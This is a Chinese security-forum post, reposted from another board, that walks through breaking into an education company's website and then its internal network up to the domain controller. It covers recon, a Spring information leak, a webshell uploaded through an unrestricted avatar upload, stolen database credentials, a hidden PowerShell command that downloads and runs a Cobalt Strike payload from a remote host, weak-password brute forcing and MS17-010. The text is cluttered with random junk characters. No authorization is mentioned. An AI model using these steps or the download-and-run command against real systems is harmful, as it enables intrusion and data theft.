中国网络渗透测试联盟

标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]
作者: admin    时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程

% T3 |8 i4 n$ `" T3 w 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路9 }4 Z9 y! \0 U9 ^

) I4 N) |! I2 _* p; I! j

$ ?% }0 C5 t; t& x  7 b4 i6 E0 ^8 u- r+ f

0 |7 O- Z: t, w" p2 z

+ m# C$ x4 u' ~9 f$ D& s 正文 0 B" }% Z' ?6 w# d) b2 y

0 H* f: x p( O, c# V, b, S T

& \9 E" _8 H' O8 t# T: g7 M  - o+ _8 P; J! i3 m& `5 [$ o

$ @' q2 @) }! b" J+ t! H

* u. k# A) \9 t9 [( I! t2 B 目标:www.xxxx.com(一家教育机构)
6 _( h- e6 C% \4 {打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能 3 S* u3 B! Y- a/ F$ i) z

7 y' i) z: [5 Z0 Y* X: _; A5 I |

4 g0 @) A$ m6 u! S/ j4 E vshapes= 8 f7 M3 `. U5 m

0 ]9 u+ ^( g' s: T4 l2 { a

4 q) c2 o2 l* i 进行了简单的信息搜集
( x3 b) S8 t0 W: J. g
% ?& _' G5 G! U8 x/ a9 I3 I; c, ? 1 g9 m) u. A4 c- E7 a

; a" T% v2 I+ k1 z

+ ], F5 {& U1 C7 B" ] 子域名搜集 # M& M+ v2 D% `% x |2 T

9 c1 l; p; G+ }: U( k z* ^

9 c5 w) A2 c) h' q4 m vshapes= . a! Z0 W! y& `$ u$ i, r8 l2 W( \

, ?2 b0 a0 d$ ^6 F# ~

1 M4 f/ K! \6 A0 F/ F* S: I2 }7 b( o fofa找资产
! {6 p3 Y' O# q" h
! W" j) {9 A: z% C0 S 6 B/ G8 a) ?' }- D1 m

; E+ C/ J+ P6 ?: f

$ c- U: Y! s6 M3 } vshapes=7 Q; y5 l& |6 h$ c5 ~8 p( Z& ~

8 a3 W7 e- E2 f' g6 }% B

p# z3 j N/ c1 B! a6 G 一共七个资产。去重之后只有两个。
' @) C7 T# o2 A" w0 m# A
) ` p( H' \* k+ _' l# H6 x 5 Q' X% U4 h0 G+ e( @. k

( {* O. ^8 I/ i# Q

9 ?+ d- l9 P; B) N" ~ 目录探测 & U. o" j+ [& V- |+ `( i0 N

8 f, E; s6 Q. m6 }

$ Q2 d, k( z4 f vshapes= / L p% G4 H9 p7 d2 o/ R9 P. ]

3 @) [ G7 ]) Q7 {

. r/ M0 j* V( D3 z% E) e* y 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
5 }& [4 a# n" i7 a8 q. V
7 c4 m. A6 U: Y- `$ J9 }) w4 T6 \9 m9 s# Q1 ?2 {+ Q" H# i/ U

- y$ w8 @8 Z6 F6 m$ i" ~

R) J. D) q0 W0 j0 ]3 ] 我又尝试了通过修改返回包来绕过登录界面 9 Z1 \! m' ~, {/ |2 P3 L& Y

3 F) }$ |- Z" Y; L3 c9 ^( |) L

9 i Y2 l$ N% O' k9 Q2 G* b3 z vshapes=, f/ K- D" w8 x

; w) I3 E0 j2 G& u' d

/ R; E7 O# D. P6 f2 e 还是不行,尝试注入无果 % n( u z9 o( W) J' ~" R4 G, ]& f

! u4 ]2 V: u; {( u

0 r% M2 s! L+ A vshapes= - C. a/ W; X& K5 J& L; h

" _: U1 I0 Y' L1 r' W

: n2 B' B; m8 e7 T0 F: ]5 y/ N2 ` 不过我目录探测出了一处Spring信息泄露
u4 W2 h% u/ q3 r' u3 L: c0 k
7 r, v: R% m7 J# g1 ? & {4 J7 _& E) L# L

+ t9 d9 q4 F5 \( V- U

7 Z! ?3 C' K) s. p vshapes=' R8 j6 f6 ` W# ?$ e9 o* p

! r9 a" ]9 q. F' N: h

0 a( B) E3 w+ F$ i4 [$ \ 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 : }& N, [' }# u5 \7 V" F

2 N) `; l0 c- X/ }, k: P; Z

! t; |. [7 {* L0 H; z! Q C; x% L. J vshapes=8 n7 {8 F8 p! ^) S. k

" a! J$ R% ]( h! Q( y) `

# Y/ H; I) q7 ^* M* n 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 % k* S( u% C) s- n8 g) C- L+ ], v

, {; b3 V f5 ]! W& n9 e

5 |: p" y1 I) b2 |) j1 e vshapes=2 u% v t. f! |; e7 Q

8 A4 ]: A% }) B) E

: J! N+ [( O/ c* }$ f1 Q) e& m 获取有些师傅到这一步就手机抓包电脑测了。% i8 e/ w% D) ]( Q# N( c

1 E3 Y1 I$ {' A& Z# l3 n

( P. z; g& ^/ a& W$ s( N Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。7 r5 o& o6 f4 U9 k9 H) V6 Y

- ?3 U% M7 Y- ?; q; q

0 q) |5 O6 C {2 L1 U* k 其中在一个公众号发现了小程序,可以进行注册。 % T: P& B& S, V& W. W( o

# R7 _' n0 O# `8 ~5 }- L

0 M) Y/ |* |8 J9 m2 a% _$ p 看到了头像上传,尝试上传获取WebShell - {, w7 c# `4 T1 U: u

, G% i* m7 J; G+ `; c

' r1 a2 Z8 S2 [ vshapes= 4 Y4 v6 b6 |4 ?& f) X

5 K- Y. e/ R3 ]7 Q9 D" A

( ~6 x- U! p \$ Q0 \ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问( l7 `; U9 Y; H

+ L3 l9 Z: \, A1 p7 @2 J' {9 r- S

9 p* H, k* N/ Z1 K& u7 r" \' E vshapes=2 \. j3 I! T f7 q

& _6 i8 p6 `/ X( g4 P6 j+ J) P% @+ ~

& i0 ]1 w. U$ N. N2 r } z4 a 然后上了大马 0 u- O5 T4 T. Z, l4 f+ y

6 h- a2 P8 o, w

1 m# Y1 i& l+ ?8 G vshapes= 9 c2 W. S# T# H; Z6 C

6 Q& {* B: ^6 X, @) |

, F/ z& p: `* w; a5 F6 X vshapes= 2 K! y+ v+ B, r: r7 @1 F6 T

, _/ x5 F2 j" J4 P: K9 P1 N+ C( `, F

/ U, @5 q. {6 e9 y9 `* N 通过翻找文件发现数据库账号密码 + k: ]" n8 X: k. G

- x. i: [# Q0 {. T5 V

, f" V& z y4 D3 w( p/ k vshapes=7 P9 F% T, J5 C5 S. y6 w) _5 ^

) t0 \8 u$ r- N" h3 }

1 a. Y C R7 g( A" y7 Q% {. V+ V --内网渗透 ' h! z, E; ~5 _! v* |

6 Z' z; ^0 u F$ k

$ m4 H& [+ p9 B1 B4 P+ L& [ 直接通过powershell执行 cs上线 0 q0 j5 w6 G6 Y( D3 L

& H4 Q" R7 V& j8 f

/ T7 ?* \! \3 t- b x; }# V powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" 5 G. h) B3 W' F! `: C% n% L, j( K/ Q2 T

# I" O* d, Y* b1 F( D! B

% e4 Y% c; |3 n vshapes=" q( }5 Z+ y# o8 X) _% X

; O! j2 Q( b7 v" X* v( g

+ f. W: c! U" V% G1 \/ |4 U6 m 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破# W4 s5 x, {2 C$ T

& d' e9 T5 Z5 Q; W4 B1 @+ ]

+ m$ |0 x# q9 T, g3 W vshapes=1 @: G$ b0 M' y8 z

) j$ ?1 q* U# n

$ s6 l$ w+ a% F( z 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
# v( p- g; s4 z+ Z1 a
$ ~9 g& B+ j/ V
5 r0 V5 [9 u4 M. x* _3 a5 T9 [! R; D4 \

- G; I/ i8 ^! X

9 q/ S/ {2 q2 q& e: m9 T vshapes=: h& X6 j6 G- u" J1 B" S

4 n0 L3 q* P( {1 d8 P: X

9 w7 o0 W$ n6 z( I% |5 J, _, | 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
5 }/ B, f5 F$ a# z
- ~( y* v7 h) R3 S/ D4 Y( p$ [( e' [" h4 L- s0 I6 I

5 _# a; _. M: F% a! O0 q1 t- H5 I! _

2 R7 m3 q& @( g0 T2 T$ b vshapes=/ }; N. x8 @$ E( I

Q. C. q6 V2 E; {

+ m: W u$ K; M
* j4 o: S2 {$ b
8 H: U& Y4 W/ t8 @6 Y$ v0 x& V5 m% I4 |8 E' C

0 ~/ Q0 p, `: k

& c8 a0 _: Q* F- L3 v: V1 X  * o2 _9 ^/ g$ S" [$ _

8 M; h2 w3 U4 k5 j. W

# C1 u! }/ I6 f& m 小结 5 D. \ N6 ]. f" j5 q: h

( Q, }" L% K/ f b0 V

: R% m5 n% C% B) U/ I. R% v1 d/ l% E  5 k, n( ]/ e" D H0 k3 Y

* |/ I6 u3 @# D( N2 q( O+ a0 n

) {; U9 L2 u/ \* s$ M. Z0 L 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!8 J$ K. e6 n9 _7 N5 G. o

' l2 a5 X% Q! Y8 K( s% F8 [( }

1 r2 O- h1 h& [" R: c   ; u0 P# e) ?1 l

' O4 s, _4 d6 C7 \ 4 ?- D. i1 Y: [ z r, l" H' `

0 D1 \) K' `) g" s7 P, i1 K" i 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html / o5 S1 _3 [# X% ]

! c; i8 b) T K7 |/ K

. B" R& O* V/ o( C  + L/ b. d$ w1 U4 r9 }; |





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2